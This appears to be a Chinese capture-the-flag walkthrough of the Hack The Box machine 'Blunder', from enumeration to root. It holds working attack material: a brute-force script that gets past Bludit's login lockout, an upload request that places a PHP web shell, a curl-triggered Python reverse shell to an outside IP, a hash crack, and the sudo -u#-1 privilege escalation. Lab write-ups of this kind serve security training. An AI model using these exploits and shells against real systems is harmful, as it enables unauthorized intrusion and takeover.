[Meachines] [Easy] Blunder Bludit-CMS-Upload+SUDO-Bypass权限提升

信息收集

IP Address Opening Ports
10.10.10.191 TCP:80

$ nmap -p- 10.10.10.191 --min-rate 1000 -sC -sV

bash 复制代码
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts
|_http-server-header: Apache/2.4.41 (Ubuntu)

www-data 权限

$ gobuster dir -u "http://10.10.10.191/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50

http://10.10.10.191/todo.txt

username:fergus

$ cewl 10.10.10.191 > pass.txt

python 复制代码
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []


with open('pass.txt', 'r') as words:
    for line in words:
        line = line.rstrip()
        wordlist.append(line)


for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)

    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p=password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u=username, p=password))
            print()
            break

$ python3 exp.py

Password:RolandDeschain

https://github.com/bludit/bludit/issues/1081

bash 复制代码
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------423763520129402281753554177338
Content-Length: 173373
Origin: http://10.10.10.191
Connection: close
Referer: http://10.10.10.191/admin/new-content
Cookie: BLUDIT-KEY=7vn276oblmdb0l4kt4n3sltkl5


-----------------------------423763520129402281753554177338
Content-Disposition: form-data; name="images[]"; filename="TEAM.php"
Content-Type: image/png


<?=phpinfo();system($_GET[0]);?>
-----------------------------423763520129402281753554177338

Content-Disposition: form-data; name="uuid"


../../tmp
-----------------------------423763520129402281753554177338
Content-Disposition: form-data; name="tokenCSRF"


96062fa2efef00e52320951d57034af3a4f480f4
-----------------------------423763520129402281753554177338--

$ curl "http://10.10.10.191/bl-content/tmp/TEAM.php?0=python%20-c%20'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.16.6%22%2C10032))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimport%20pty%3B%20pty.spawn(%22%2Fbin%2Fsh%22)'"

User 权限

$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php

username:hugo
hash:faca404fd5c0a31cf1897b823c695c85cffeb98d

https://md5decrypt.net/en/Sha1/

!

password:Password120

User.txt

$ cat /home/hugo/user.txt

cb37fd3c2e81e209769763b3fd001348

权限提升

$ sudo --version

$ sudo -u#-1 /bin/bash

Root.txt

# cat /root/root.txt

d10d349c006d7beb3e00cf067fba123d

相关推荐
广州灵眸科技有限公司1 小时前
瑞芯微RV1126B开发板(EASY-EAI-PI2) INI文件操作
java·前端·javascript·网络·人工智能
星恒讯工业路由器3 小时前
VLAN在工业网络中为何越来越重要
网络·信息与通信·vlan·交换机·工业网络·网络隔离
rcms152702692183 小时前
HITEK A1052100N-01 以太网端口模块
网络
KaMeidebaby3 小时前
卡梅德生物技术快报|抗体合成:多肽抗体合成工程化方案:Nsp2 保守肽多抗制备与多维度验证
前端·网络·数据库·人工智能·算法
her_heart5 小时前
把 ChatGPT 5.6 放进需求评审和测试设计之后,我反而减少了“一次成稿”的期待
网络·人工智能·网络协议·chatgpt·测试用例
HehuaTang5 小时前
ovs 中n-handler-threads n-revaidtor-threads作用
网络
讯展互联6 小时前
实体业态运营效率分析:装修门店投放自主与外包的人力模型对比
大数据·网络·经验分享·创业创新·学习方法
JL158 小时前
Agent工程-为什么Agent必须有观测和Tracing
服务器·网络·人工智能·安全
神州世通8 小时前
IP Office内置外显卡兼容性说明
服务器·网络·tcp/ip
GoFly开发者10 小时前
Go语言开发框架GoFlyGen新增 网站安全助手 插件,帮助开发者提供应用安全防护,保障平台系统数据安全。
网络·安全